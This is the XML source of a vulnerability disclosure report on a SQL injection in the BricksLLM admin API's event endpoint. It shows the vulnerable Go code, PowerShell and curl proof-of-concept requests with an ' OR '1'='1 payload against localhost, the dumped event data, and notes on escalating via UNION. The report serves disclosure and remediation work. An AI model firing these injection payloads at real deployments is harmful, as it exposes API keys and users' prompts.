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09EF" w14:textId="472B7485" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>SQLi-0</w:t>
      </w:r>
      <w:r w:rsidR="00A31202">
        <w:rPr>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>: SQL Injection in GetEvents — customId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2"/>
        <w:gridCol w:w="5484"/>
      </w:tblGrid>
      <w:tr w:rsidR="003703C8" w14:paraId="2AECF7FD" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="4B90C8DA" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="0C76216D" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="0F2C9CFB" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037F2F71" w14:textId="397CDD7C" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="414BACAF" w14:textId="0649A981" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="D32F2F"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00F61BC8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://github.com/bricks-cloud/BricksLLM</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="532B4BDA" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF270E3" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E19558" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D32F2F"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="5A89F310" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F09BFD7" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CVSS 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7411662E" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="0462D478" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793E8C7E" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA0BC40" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>CWE-89: SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="71120E33" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E7DC4C0" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19F1ECB1" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>GET /api/events?customId=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="2DBDA297" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB7BACE" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F86497B" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>customId (query string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="4F156B08" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F134974" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F5D5BD" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>internal/storage/postgresql/event.go, Line 135</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C3531" w14:paraId="6EF75A1F" w14:textId="77777777" w:rsidTr="005C3531">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03B7F4AB" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4331F7AC" w14:textId="77777777" w:rsidR="005C3531" w:rsidRDefault="005C3531" w:rsidP="005C3531">
            <w:r>
              <w:t>None required (admin API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="224952E5" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDE9F0" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The customId query string parameter is interpolated directly into SQL via fmt.Sprintf inside a WHERE clause with single quotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350498B8" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>func (s *Store) GetEvents(userId string, customId string, ...) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    query := `SELECT * FROM events WHERE `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  if len(customId) != 0 {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        query += fmt.Sprintf(" custom_id = '%s'", customId)   // &lt;-- INJECTION POINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }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 xml:space="preserve">    // customId is injected directly — no $N parameterization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    rows, err := s.db.QueryContext(ctxTimeout, query)  // no args passed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C63A07E" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6510A67D" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TESTED &amp; CONFIRMED ON 127.0.0.1:8001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFE366" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24539FAA" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$wc = New-Object System.Net.WebClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$r = $wc.DownloadString(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "http://127.0.0.1:8001/api/events?customId=' OR '1'='1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>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># cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>curl "http://127.0.0.1:8001/api/events?customId=%27%20OR%20%271%27%3D%271"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37210DE8" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Actual Server Response (truncated for readability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F4C42" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "id": "fb4ea513-6e47-4e44-bd04-39031e3486f1",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "created_at": 1774983971,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "key_id": "",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "status": 404,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "path": "/",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "method": "GET",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "correlationId": "c9b67ef9-b35d-4481-aaa0-fe83db470db4"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "id": "44aed353-dfbb-45ef-87ca-fb3c10c79eba",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "created_at": 1774984620,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "tags": ["testing"],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "key_id": "f7bdb5ba-2083-44bc-b65d-f9a774093414",   ← LEAKED KEY ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "provider": "openai",                                 ← LEAKED PROVIDER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "model": "gpt-4",                                     ← LEAKED MODEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "status": 401,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "latency_in_ms": 815,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "path": "/api/providers/openai/v1/chat/completions",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "method": "POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "id": "13a06e19-72c3-4c7e-80dc-a7ff13371b39",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "created_at": 1774986032,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "provider": "azure",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "status": 401,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "path": "/api/providers/azure/openai/deployments/gpt4/chat/completions"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  ... 2 more events (5 total dumped) ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>⚠ ALL events dumped — including:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  - key_id: links events to specific API keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  - provider + model: reveals which LLM services are in use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  - paths + methods: API usage patterns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  - request/response: may contain sensitive prompts/completions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    (base64 encoded in "request"/"response" fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE16961" w14:textId="77777777" w:rsidR="00A31202" w:rsidRDefault="00A31202">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28C294" w14:textId="456BAD3A" w:rsidR="00A31202" w:rsidRDefault="00A31202" w:rsidP="00A31202">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Here is the Exploit POC using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jsql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AD7D7" w14:textId="094B3CCA" w:rsidR="00A31202" w:rsidRDefault="00A31202">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2667C54F" wp14:editId="4C110EA5">
            <wp:extent cx="5486400" cy="2570480"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="45950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09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44AF" w14:textId="6921E569" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100DD12" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Complete event/audit log exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692DB9CD" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Dumps ALL proxy request events including key_id, provider, model, and actual request/response payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DEB81" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Request/response data may contain sensitive LLM prompts and completions (PII, business logic, user data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54807B45" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Reveals all active API keys via key_id field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005E3E0" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Can be escalated via UNION to read from other tables (keys, provider_settings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03F219" w14:textId="77777777" w:rsidR="003703C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Remediation</w:t>
      </w:r>
    </w:p>
